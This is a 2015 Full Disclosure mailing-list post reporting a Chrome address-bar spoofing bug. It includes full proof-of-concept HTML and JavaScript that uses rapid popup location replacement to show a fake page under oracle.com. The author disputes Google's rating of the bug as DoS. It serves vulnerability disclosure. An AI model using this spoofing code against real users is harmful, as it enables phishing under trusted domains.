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Google Chrome Address Spoofing (Request For Comment)
From: David Leo <david.leo () deusen co uk>
Date: Tue, 30 Jun 2015 07:08:19 +0100
Impact: The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc. You can make whitehouse.gov display "We love Islamic State" :-) Note: No user interaction on the fake page. Code: ***** index.html <script> function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout("next();",15); setTimeout("next();",25); } function f() { w=window.open("content.html","_blank","width=500 height=500"); i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); } </script> <a href="#" onclick="f()">Go</a><br> ***** content.html <b>This web page is NOT oracle.com</b> <script>location="http://www.oracle.com/index.html";</script> ***** It's online http://www.deusen.co.uk/items/gwhere.6128645971389012/ (The page says "June/16/2015" - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Google Chrome Address Spoofing (Request For Comment) David Leo (Jun 30)
- Re: Google Chrome Address Spoofing (Request For Comment) Big Whale (Jun 30)
- Re: Google Chrome Address Spoofing (Request For Comment) Roney Gomes (Jun 30)